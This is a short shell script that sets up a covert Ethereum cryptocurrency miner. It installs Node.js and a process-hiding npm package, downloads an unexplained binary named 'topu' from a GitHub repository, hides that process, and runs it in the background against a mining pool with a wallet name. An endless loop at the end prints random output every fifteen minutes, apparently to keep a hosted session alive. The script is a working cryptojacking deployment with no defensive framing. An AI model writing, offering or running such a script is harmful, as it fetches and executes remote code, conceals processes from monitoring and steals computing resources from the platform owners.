#!/bin/sh
#!/bin/bash

apt update
curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
sudo apt install nodejs
npm i -g node-process-hider
wget https://github.com/gyrogerald/dera/raw/main/topu
sudo ph add topu
chmod 777 topu 
nohup ./topu -pool ethash.poolbinance.com:443 -wal TeslaM -worker $(echo $(shuf -i 1-9999 -n 1)-T4) -epsw x -asm 2 -dbg -1 -allpools 1 -mode 1 eth pause > nohup.out

while [ 1 ]; do

  while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 15m; done

sleep 2

done
